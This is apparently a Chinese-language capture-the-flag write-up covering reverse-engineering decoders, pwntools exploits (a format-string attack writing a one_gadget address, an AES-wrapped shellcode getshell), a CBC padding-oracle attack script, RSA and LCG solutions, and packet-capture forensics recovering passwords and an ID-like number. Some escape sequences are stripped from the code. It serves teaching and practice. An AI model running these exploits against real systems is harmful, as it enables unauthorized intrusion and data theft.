Reverse

re_ds001

打开附件之后有一个密文文件和加密器

加密器放到ida里面

可以看到加密器首先将一个未加密的文件加载成buffer，之后将buffer传进加密函数里面，加密逻辑如下

简单来说，首先进行了一次base64加密，之后进行了一次自定义逻辑加密

自定义逻辑是

左移右移之后，数据不会丢失，所以直接逆向即可

#include<stdio.h>
#include<windows.h>
int main()
{
    char a2[] = { 0x6a,0x53,0x2a,0xd3,0x6a,0xa2,0x8a,0xd3,0x72,0x22,0xca,0x91,0x6a,0x53,0xca,0x3b,0x7a,0x22,0x4a,0x91,0x6a,0x53,0x3b,0x99,0x6a,0x53,0x0a,0xc3,0x6a,0x22,0x4a,0xd3,0x6a,0x53,0x1b,0xa9,0x72,0xd3,0x2a,0xa1,0x4a,0x22,0x32,0x53,0xd2,0xba,0x8a,0xbb,0x6a,0xaa,0x0a,0xc3,0xca,0xcb,0xa9,0x53,0x13,0x91,0x81,0x5a,0x6a,0x53,0x2a,0xc3,0x6a,0x53,0xaa,0x89,0x6a,0x53,0xaa,0xcb,0x6a,0x22,0x2a,0x3b,0x7a,0x22,0x1b,0x91,0x6a,0x22,0xaa,0x81,0x6a,0xa2,0x5b,0x91,0x72,0x22,0x4a,0xc3,0x6a,0xa2,0x1b,0xa1,0x6a,0x22,0x43,0xca,0x4a,0x3a,0xb2,0x53,0x6a,0x22,0x3b,0x99,0x72,0xa2,0x72,0x0a,0x72,0x3a,0x72,0x4b,0x6a,0x4b,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0xca,0x91,0x6a,0xa2,0x4a,0xbb,0x72,0xd3,0xca,0x81,0x6a,0x53,0x1b,0x3b,0x72,0xd3,0x3b,0xa9,0x6a,0xa2,0x5b,0xcb,0x6a,0xa2,0x5b,0x91,0x72,0xa2,0x4a,0x91,0x6a,0x22,0xca,0xa9,0x6a,0x53,0x6a,0xa9,0x4a,0x3a,0x72,0x53,0xca,0x53,0x6a,0x91,0x7a,0x3a,0xaa,0xa1,0x8a,0x3a,0xca,0xa1,0x7a,0xa2,0x2a,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0x2a,0xcb,0x6a,0xa2,0x2a,0x91,0x6a,0xd3,0xca,0x99,0x6a,0x53,0xca,0x3b,0x7a,0x22,0x1b,0x89,0x72,0x53,0xaa,0x99,0x6a,0xa2,0x5b,0x99,0x72,0xa2,0x4a,0xa9,0x6a,0xa2,0x3b,0xa9,0x6a,0x53,0x5b,0x91,0x4a,0x22,0xca,0x81,0x7a,0x3a,0x8a,0xcb,0xd2,0x22,0x12,0x0a,0x6a,0x3a,0x8a,0x91,0xd2,0x4b,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0x89,0x6a,0xa2,0xaa,0xa1,0x72,0xd3,0xca,0x81,0x72,0xa2,0xaa,0x3b,0x7a,0xa2,0x1b,0x99,0x6a,0xa2,0xca,0xd3,0x6a,0x53,0x0a,0xc3,0x72,0xd3,0x4a,0xc3,0x6a,0x22,0x1b,0x91,0x7a,0xa2,0x4a,0xd3,0x4a,0x22,0x8a,0xa9,0xca,0xd3,0x92,0x43,0x72,0x5b,0x0a,0xa1,0x72,0xba,0xca,0xa1,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0x53,0xaa,0xa1,0x6a,0x53,0x0a,0xa1,0x72,0x53,0xaa,0xa1,0x6a,0x22,0x5b,0x3b,0x72,0xd3,0xaa,0xa1,0x7a,0xa2,0x3b,0x91,0x6a,0xa2,0x5b,0x89,0x7a,0xa2,0x4a,0x81,0x6a,0xa2,0x5b,0xa1,0x6a,0xa2,0x52,0xca,0x4a,0x22,0x8a,0x81,0xd2,0x53,0x5b,0xc3,0xca,0xba,0xb2,0x0a,0xca,0xba,0x4a,0xd3,0xd2,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0xca,0x99,0x6a,0x53,0x2a,0xc3,0x72,0x22,0xaa,0xa1,0x6a,0x22,0x1b,0x3b,0x7a,0xa2,0x8a,0xa9,0x6a,0xd3,0xca,0xa9,0x6a,0xa2,0x5b,0xa9,0x7a,0xa2,0x4a,0x91,0x6a,0x22,0xaa,0x99,0x7a,0xa2,0x1b,0x89,0x4a,0x22,0x43,0x43,0xca,0xa2,0x1b,0xa9,0x6a,0xa2,0xd2,0x0a,0xd2,0xa2,0xca,0xa9,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0x5b,0xc3,0x6a,0x53,0xca,0x81,0x7a,0x22,0x6a,0x3b,0x72,0xd3,0xca,0x91,0x72,0x53,0x5b,0x89,0x6a,0xa2,0x5b,0x89,0x72,0x53,0x4a,0x99,0x6a,0x22,0x1b,0x99,0x6a,0x53,0x4a,0x89,0x4a,0x22,0xaa,0xa9,0x72,0xa2,0x1b,0xcb,0x6a,0x2a,0x0a,0x91,0xd2,0xa2,0xca,0xbb,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0xa2,0x6a,0xd3,0x6a,0x53,0xaa,0xa9,0x6a,0x53,0x6a,0x3b,0x72,0xd3,0xca,0xa9,0x72,0x53,0xaa,0x89,0x6a,0xa2,0x5b,0x89,0x6a,0x53,0x4a,0x81,0x6a,0x53,0x1b,0xa1,0x6a,0xd3,0xca,0x91,0x4a,0x22,0x92,0x6b,0xca,0xba,0x72,0x43,0x72,0x5b,0x12,0x53,0xca,0x91,0x4a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0xca,0x99,0x6a,0xa2,0x1b,0xcb,0x7a,0xa2,0xaa,0xa1,0x6a,0x22,0x4a,0x3b,0x72,0xd3,0x2a,0xa9,0x6a,0xa2,0xaa,0x89,0x6a,0xa2,0x5b,0x91,0x72,0xd3,0x4a,0x89,0x6a,0x22,0x1b,0x91,0x6a,0x53,0x6a,0x81,0x4a,0x22,0x12,0x5b,0xca,0x53,0x3b,0x99,0x7a,0xa2,0x5b,0xc3,0x8a,0x3a,0x4a,0x99,0x72,0x1a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xaa,0x91,0x6a,0xa2,0xaa,0xcb,0x6a,0xd3,0xaa,0x89,0x6a,0x53,0x6a,0x3b,0x72,0xd3,0x0a,0xa9,0x72,0x22,0xaa,0xd3,0x6a,0xa2,0x5b,0x91,0x6a,0xd3,0x4a,0x81,0x6a,0xa2,0xca,0x99,0x72,0x53,0x5b,0xa1,0x4a,0x22,0x0a,0xa1,0x6a,0x6b,0x72,0x53,0x72,0xa2,0x43,0x0a,0x72,0x3a,0x8a,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0x89,0x6a,0x53,0x3b,0xa9,0x6a,0x53,0xaa,0xc3,0x72,0xa2,0x8a,0x3b,0x72,0xd3,0x6a,0x91,0x72,0x22,0xca,0xd3,0x6a,0xa2,0x5b,0xa9,0x72,0xa2,0x4a,0xa1,0x6a,0xa2,0x0a,0xa1,0x7a,0xa2,0x1b,0xc3,0x4a,0x3a,0x8a,0xbb,0x72,0xba,0x92,0x6b,0xca,0xaa,0x12,0x4b,0x72,0x6b,0x72,0x63,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0x6a,0xd3,0x6a,0x53,0xaa,0xa9,0x7a,0xa2,0x2a,0x3b,0x7a,0x22,0x5b,0x99,0x72,0x22,0x3b,0xa9,0x6a,0xa2,0x5b,0x99,0x6a,0xd3,0x4a,0x99,0x6a,0xa2,0x5b,0x99,0x72,0xd3,0x4a,0xa1,0x4a,0x22,0xb2,0x6b,0xca,0xa2,0x0a,0xd3,0xca,0x81,0x12,0x5b,0xd2,0x6b,0x2a,0x81,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0x91,0x6a,0xa2,0x5b,0xbb,0x6a,0xa2,0xca,0x91,0x72,0xa2,0x3b,0x3b,0x7a,0x22,0xaa,0x91,0x7a,0x22,0x3b,0x89,0x6a,0xa2,0x5b,0x91,0x72,0x53,0x4a,0x81,0x6a,0x22,0x5b,0xa1,0x7a,0xa2,0x6a,0xbb,0x4a,0x22,0xd2,0x4b,0xca,0xd3,0x72,0x63,0xd2,0x5b,0x0a,0x91,0x72,0x1a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0xa2,0x1b,0x99,0x72,0xd3,0xca,0x91,0x72,0xd3,0x2a,0x3b,0x72,0xd3,0xaa,0x89,0x72,0x22,0x1b,0xc3,0x6a,0xa2,0x5b,0xa1,0x6a,0xa2,0x4a,0x91,0x6a,0x53,0xaa,0xa1,0x72,0x22,0x4a,0xcb,0x4a,0x22,0x5b,0x81,0x72,0x53,0x4a,0xbb,0xd2,0xba,0x72,0x0a,0xca,0x53,0x2a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0xca,0xa1,0x7a,0x22,0xca,0xd3,0x7a,0xa2,0xaa,0x3b,0x72,0xd3,0x5b,0x91,0x72,0x53,0x5b,0xcb,0x6a,0x53,0x0a,0xc3,0x72,0x22,0x6a,0xbb,0x6a,0x22,0x6a,0xa1,0x6a,0x22,0x2a,0x91,0x4a,0x22,0x43,0x6b,0x6a,0x22,0x23,0x5b,0x72,0x53,0x52,0x0a,0x7a,0x3a,0x2a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0x53,0x1b,0x91,0x7a,0x22,0xca,0x89,0x7a,0x22,0x5b,0x3b,0x72,0xd3,0x5b,0x89,0x72,0xd3,0x3b,0xc3,0x6a,0xa2,0x5b,0x91,0x72,0xd3,0x6a,0xbb,0x6a,0x53,0x0a,0x89,0x7a,0x22,0x8a,0xcb,0x4a,0x3a,0x52,0x6b,0x72,0x53,0xaa,0xc3,0x7a,0xaa,0x12,0x4b,0xd2,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0xa1,0x6a,0x53,0x4a,0x91,0x72,0xa2,0xaa,0xd3,0x6a,0x22,0xca,0x3b,0x7a,0xa2,0x4a,0xa9,0x6a,0x53,0x3b,0xa1,0x6a,0x53,0x0a,0xc3,0x6a,0xa2,0x4a,0xcb,0x6a,0xa2,0x4a,0x91,0x72,0xa2,0xca,0xa1,0x4a,0x22,0x0a,0xa9,0x6a,0x3a,0x4a,0xa9,0xca,0x53,0x43,0x0a,0x6a,0x6b,0x2a,0x89,0x6a,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0x2a,0xd3,0x6a,0xa2,0x8a,0x99,0x72,0xd3,0xca,0xc3,0x72,0xd3,0x4a,0x3b,0x72,0xd3,0xaa,0x99,0x6a,0xa2,0xaa,0x99,0x6a,0xa2,0x5b,0xa9,0x6a,0x22,0x4a,0xd3,0x6a,0x53,0x6a,0x89,0x72,0x53,0x2a,0xa1,0x4a,0x3a,0x92,0x43,0x6a,0x22,0x0a,0x81,0x7a,0x22,0x0a,0xa9,0x8a,0x22,0x5b,0xc3,0x62,0x6b,0x72,0xb3,0x13,0x8a,0x7b,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0xa2,0x5b,0x89,0x72,0x22,0xaa,0xc3,0x72,0xa2,0x4a,0x3b,0x7a,0xa2,0xca,0xa1,0x7a,0x22,0xaa,0xa9,0x6a,0xa2,0x5b,0x91,0x6a,0x22,0x4a,0x89,0x6a,0x22,0x1b,0x89,0x72,0xa2,0xaa,0x89,0x4a,0x22,0x23,0x43,0x6a,0x53,0xaa,0xc3,0x8a,0x22,0x0a,0xa9,0xd2,0xa2,0x6a,0xab,0xca,0x91,0xa1,0x5a };
        int result; // rax
        unsigned int v4; // [rsp+24h] [rbp+4h]
        int i; // [rsp+44h] [rbp+24h]
        v4 = strlen(a2);
        for (i = 0; ; ++i)
        {
                result = v4;
                if (i >= (int)v4)
                        break;
                a2[i] = (32 * a2[i]) | ((int)(unsigned __int8)a2[i] >> 3);

        }
        printf("%s", a2);
        return 0;
}

得到的base64编码解密即可

re_ds002

RC4+异或

调试获得密钥key，6A1D4E2a2276Y7JL

异或的密钥276Y7JB6A1D4E2A2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define N 256
//定义S-box S[256] 
unsigned char S[N];
//初始化S-box中的256个字节，key是加密密钥 
void Init_Sbox(unsigned char* key, int key_len)
{
    int i = 0, j = 0;
    unsigned char tmp = 0;
    //先将S[256]填充为空 
    for (i = 0; i < N; i++)
        S[i] = i;
    //用key填充S[256] 
    for (i = 0; i < N; i++)
    {
        j = (j + S[i] + key[i % key_len]) % 256;
        tmp = S[i];
        S[i] = S[j];
        S[j] = tmp;
    }
}

//RC4加密函数 
void Encrypt(unsigned char* Data, int DataByte, unsigned char* Key, int KeyLen)
{
    int i = 0, j = 0, t = 0;
    unsigned char tmp;
    Init_Sbox(Key, KeyLen);
    for (t = 0; t < DataByte; t++)
    {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        tmp = S[i];
        S[i] = S[j];
        S[j] = tmp;
        Data[t] ^= S[(S[i] + S[j]) % 256];
    }
}

//RC4解密函数 
void Decrypt(unsigned char* Data, int DataByte, unsigned char* Key, int KeyLen)
{
    int i = 0, j = 0, t = 0;
    unsigned char tmp;
    Init_Sbox(Key, KeyLen);
    for (t = 0; t < DataByte; t++)
    {
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        tmp = S[i];
        S[i] = S[j];
        S[j] = tmp;
        Data[t] ^= S[(S[i] + S[j]) % 256];
    }
}

//RC4加密/解密主函数 
int main()
{
    //定义数据、密钥及其有效长度 
    // 文件路径
    const char* filePath = "D:\Download\re_ds002\en_file_data.enf2";
    // 创建一个足够大的数组来存储数据
    unsigned char data[2048]; // 假设文件大小不超过1024字节
    unsigned char data1[2048];
    // 打开文件
    FILE* file = fopen(filePath, "rb"); // 以二进制模式读取
    // 从文件中读取数据到数组data中
    size_t bytesRead = fread(data, sizeof(unsigned char), sizeof(data), file);
    unsigned char key[] = "6A1D4E2a2276Y7JL";
    unsigned char xor_key[] = "276Y7JB6A1D4E2A2";
    int keyLen = 16;
    int dataLen = strlen((char*)data);
    for (int i = 0; i < dataLen; i++)
    {
        data1[i] = data[i] ^ (xor_key[i % keyLen]);
    }
    //解密 
    Decrypt(data1, dataLen, key, keyLen);
    printf("解密后 : %sn", data);
    return 0;
}
解密得 ： 35819955202 855981200427146647 821[email protected]

PWN

pb

就是简单的bss上的格式化字符串漏洞

exp

from pwn import *
import base64
#p=process('./pb')
p=remote('106.15.53.199',32939)
context.clear(arch='amd64', os='linux', log_level='debug')
libc=ELF('./libc-2.23.so')
main=0x4011D6
one_addr=[0x45226,0x4527a,0xf03a4,0xf1247]
p.sendafter(b'How to do?n',b'%13
$p-%11$
p')
stack=int(p.recv(14),16)
stack_ret=stack-0xe0
log.info(hex(stack_ret))
p.recvuntil(b'-')
libc_base=int(p.recv(14),16)-0xf0-libc.sym['__libc_start_main']
log.info(hex(libc_base))
one=libc_base+one_addr[0]
log.info(hex(one))
one1=one&0xffff
one2=(one>>16)&0xffff
one3=(one>>32)&0xffff
pay=b'%'+str(stack_ret&0xffff).encode()+b'c%13$hn'
p.sendlineafter(b'How to do?n',pay)
pay=b'%'+str(one1).encode()+b'c%39$hn'
p.sendlineafter(b'How to do?n',pay)
pay=b'%'+str((stack_ret&0xff)+2).encode()+b'c%13$hhn'
p.sendlineafter(b'How to do?n',pay)
pay=b'%'+str(one2).encode()+b'c%39$hn'
p.sendlineafter(b'How to do?n',pay)
pay=b'x00'*0x20
p.sendlineafter(b'How to do?n',pay)
p.interactive()

aesc

Ida分析程序，存在一个call rax影响反汇编，直接patch掉，然后大概修复一下符号

之后对-后面的输入进行了处理，这里从插件可以看出来是aes

之后nop掉的call rax就是直接调用处理后的代码，而对于aes加密，key和iv分别为

找一段shellcode进行加密

尝试过之后发现不行，重新调试程序，发现解密数据不一致

分析加密过程可能有问题，调试发现key值会发生变化

重新解密

编写脚本getshell

from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
p = remote('XXXX',XXXX)
#p = process('./aesc')
#gdb.attach(p)
sc = 'x15xa0xcbxc8x52xbexf0x45x07x0cx44x89x89x81x16xe9x2ax0bx0exfax6bxeex2cxb8x4dxc5x5ax11xa8x18x61xb5'
payload = '-' + sc
 
p.sendline(payload)
p.interactive()

Crypto

Homooo0

crypto1部分是简单的lcg，这里直接使用grobener基求解线性关系，得到初始seed

crypto2部分是rsa给出了hint，考虑到hint = 114514^p mod q，由费马小定理知hint = 114514^p*q = 114514^n mod q，因此利用hint - pow(114514, n, n)与n求解gcd即可将n分解，得到的m是一个素因子列表，直接乘起来得到m2的值

综上将两部分flag拼接即可

from Crypto.Util.number import *
output = [379940911379953190738065211329880704968887929, 1872252095018294289102935465830666339134562151, 2218420719930619226319067546293478252242226458, 1579245444542904364875305481053943269743008549, 425392941117051285074706333070389609337530919, 657262378722139347423806179198617363063641535, 1461082838700350967433433211657342782936632658, 963751022151998652319872980044981590997051383, 1468468649834237142138916241795639564731929858, 894951290310162231498227170019052662901900106]
c = [5594765398895254497475390005515035165284947269482621212797364461116118828373030713653343829517676098247766810734167082486320857300603497577126713934378631060263065549510925849452528953404897544331443373022878004161177239661074098696364576450610303462705901680927031776827241380806829975994477307763410387909849663818842612816513488815063929788914749765715654361270374094951946698052421257227130710582004663667946833787782867142583952786583258460025201945224218183297310523389883123924792764297581896221795545651600004193837672786769087836697122181260018470054181076950975180483722573191259610507703805083959748628702, 18354543892431468698051144351651509749609506353214260811499577221908719283970286249536025926103536722940677113931335836508600695671820419801339342934435824515029299213790359041072360311512713705204002804129104738605964805164147722668894577827936326360814641394531203766344090798761628574626073504837365777460022073776704625251119419114486020315822475782336836237181108506820141633065828442597864716912066844670995455789274666742612665339577335803474044601225393448472601258235054542532455930028493965300794639477366773043061387713356068617705172707244145519119460068276515218619768447370748404523475940126401735202713, 13067613292114365350832630357309256892205092736734498409599614557765145853213115110662215358087327035294859139102830299174883445763972793544660067341892396813727940202103078616429693114912767222364824981525469897822258269033546395674755328159714895802743220805620518021794872638495366176488936655825440565962246474060922000652065256442083838487804427651100248697232018323068320537887588811670359374924969088709306632891312225283192959820408780025359635753658073155641892772680155573265995988033807925485674328357800451476663801518626815179947020769967024502712000390664616369855288447076430583396317901868635670903116, 1970246464981582185079840308342735335756570281528051357081434733605120075805108626175190939428222607679594440560718696113780016317501300998689452986221340709539874390866027325399105690522914912573749101268828961339899528345351602783733709690435381749900678529472260068811603241699935312502099438047447306331357922551536595737577778748471614413662779347020098023845496542068130118804519461892845097834511960310899125700074564461627049111870520851339107312207939096802549130703012532791227081366939019573591861482505143545888091035625734830537575454122259156021272985568985231430666257475902788787851476741010590326796, 4790816369832644851013897396728451410603728845552047537461048213879599460860175754611778658469205466634464899690642512890640661282818232275974631154994300419771468298485497765937356667986209597926878867976087643208326859946748594585252359978987853991823440517117397399904923756242431741811540597482789716480873515811069162424083734824293917807033645119197175733111304137346440353394724292956442109722691111714269187897648996544169031722249416188817927438327053576322823860564997328322821310219755433667926629085898372372888612204240167051221066348207037067965641711907104335671740191330077770626646796483577466922248, 10814650073087646346270245700026520419052331614597670711170052995832396418767254831061783825732111951302617190609152386041063604227098960001222048116476448947363754273135043354765054048027259775479829994840608711993723541933400421406020697924870102262125774838260456598741580451631667066129474067717793740121714362269552616426983298596223194062472856768981086359085984098225437548540851003103040245764298690834662920035848986451312155517111160676356001420773607652602890064569225611459892163774585206246082361752026359493618236053535568190870389696937273946530288300181042259976780219925540591411434092069627883521589, 17402258954583488899599077875782027692814099559940479055525715762308830292235828750274185447227093065906070741087056217439270030178529425666725470935320279585193413061911905402574473777027930507657670738102107008346656342925219094002445305706707695127526264448650657730801617264050097681327920107643154875069903297863683695217043121156225988854486200063498737759655924544668396741940750710151762056520992169228339196998725270006421679000430454557238994456964289263448493696220664760793673504610614794211760802780170221872766315614543591333048919946041272764838123984938843359468141442427857124108190855973548328439926]
hint = 16536285698408033188775970487002941871169646202054607075951261488252097050309959670888933647846979074234584091138294883295283655541922856105993430306089873050060823509469357653401611918358566181439207815795998432610088842959371420010593544007396878166928172572144613158071036940284924703911208736953641513236511987794121581605651025684223709898943350403042639624699485398601383308932061389249410713498575347849561123663911884193305584505859244156315903617357265674661399461569230410041997758445531606306507143956677733117597303102381050916764758656179521304902624285341437654760783955965761612971416984285177511972228
nn = 19146983551664702060097078821426397203936212633777978682169745838218120832974862357336060768023474701750459368454997765226576109516138124664705940970181884796090592025651687775377728753164334513191345754283706072450646288900663093945490502996638972998794132230852304097134994455627812996399122597839583024961826405525483276237662432278877829029168335844813894826246108076898652707988498096786814212257013685653982180235692189470315387649986765521900124337240432936201152716716736430994451736935879749385513107827824716135665305803700117296657477498198789850697139445575999541700057404516418222716008859942060344247147

R.<a, b, s> = ZZ[]
Fs = list()
for i in range(len(output)):
    s = a*s + b
    Fs.append(s - output[i])
B = Ideal(Fs).groebner_basis()
m = ZZ(B[-1])
s = ZZ(-B[2].univariate_polynomial()(0) % m)
m1 = long_to_bytes(s)


q = GCD(nn, hint-ZZ(pow(114514, nn, nn)))
p = nn // q
d = inverse_mod(65537, nn-p-q+1)
m2 = prod([ZZ(pow(ci, d, nn)) for ci in c])
m2 = long_to_bytes(m2)

print(m1 + m2)
# b'flag{ad24537876ed7f4fccbc7d9f7ca7c473}'

AESsystem

AES的cbc padding oracle

from pwn import *
#io = process('./server.py')
io = remote('XXXX',XXXX)
io.sendlineafter(b'Please enter your job name:n', b'0'*15)
io.sendlineafter(b'** Give your choice: n', b'1')
enc_flag = bytes.fromhex(io.recvline().strip().decode())
iv, enc_flag = enc_flag[:16], enc_flag[16:]
flag = b''
for b in range(0, len(enc_flag), 16):
    block = enc_flag[b:b+16]
    suffix = b''
    for i in range(16):
        now = xor(suffix, bytes([i+1])*len(suffix))
        for c in range(256):
            payload = (bytes([c]) + now).rjust(16, b'x00') + block
            io.sendlineafter(b'** Give your choice: n', b'3')
            io.sendlineafter(b'* Please input your message(hex):n', payload.hex().encode())
            res = io.recvline()
            if b'failed' in res:
                continue
            suffix = bytes([c ^ (i + 1)]) + suffix
            break
        else:
            io.close()
            print(b, i)
            print("not this time")
            exit()
    flag += xor(iv, suffix)
    iv = block
print(flag)
io.interactive()

数据分析

数据分析1

明显为ftp流量，跟踪得到用户名和密码，md5后即为flag

ftp+admin+admin123

导出ftp-data对象得到，md5后即为flag

101+key

拼图脚本
from PIL import Image
# 创建一个空白的400x400图
result_image = Image.new('RGB', (400, 400))
# 循环遍历100张图片
for i in range(1, 101):
    # 打开第i张图片
    image_path = f"./{i}.png"
    image = Image.open(image_path)
    # 将图片调整为400x4大小
    image = image.resize((400, 4))
    # 计算当前图片在拼接图像中的位置
    y = (i - 1) * 4
    # 将当前图片粘贴到拼接图像中的对应位置
    result_image.paste(image, (0, y, 400, y + 4))
# 保存拼接后的图像
result_image.save("./result_image.png")
猫变换脚本
#coding=utf-8
import cv2
from PIL import Image
import numpy as np


shuffle_times = 1
a = 0x6f6c53
b = 0x729e

def arnold_decode(image, shuffle_times, a, b):
    """ decode for rgb image that encoded by Arnold
    Args:
        image: rgb image encoded by Arnold
        shuffle_times: how many times to shuffle
    Returns:
        decode image
    """
    # 1:创建新图像
    decode_image = np.zeros(shape=image.shape)
 
    # 2：计算N
    h, w = image.shape[0], image.shape[1]
    N = h # 或N=w
 
    # 3：遍历像素坐标变换
    for time in range(shuffle_times):
        for ori_x in range(h):
            for ori_y in range(w):
                # 按照公式坐标变换
                new_x = ((a*b+1)*ori_x + (-a)* ori_y)% N
                new_y = ((-b)*ori_x + ori_y) % N
                decode_image[new_x, new_y] = image[ori_x, ori_y]
    return decode_image


img = cv2.imread('flag1.png')
flag = arnold_decode(img, shuffle_times, a, b)
cv2.imwrite('./res1.png',flag)

得到二维码后，zsteg得到base64，解密即为flag

flag{3f3c1b49504191faf6576866f99806cd}

数据分析3

post过滤，找到用户名和密码

admin:admin@QWEzxc

通过thekey过滤，得到

D124759C42CDF90C

解密返回包，得到数据库的用户名和密码

webuser:1q2w3e4r5t6y

数据分析5

搜索张三，找到加密的身份证数据，C740DE421B66E88AEB080FC4F9CA5198650633861AB15C0DE28AB85030427F15，弱口令aes解密得到身份证

420116194503103216

4825376109164835

在请求包中找到压缩包的密码

cd /d "E:phpstudy_proWWWwwwCT"&"C:/Program Files/7-Zip/7z.exe" a -pshuanqq1234 ct.zip ./&echo 514f89&cd&echo b3d11fb9bc74

导出压缩包，解压得到一堆医疗影像图，找到张三的影像图另存为png

在blue的0通道找到flag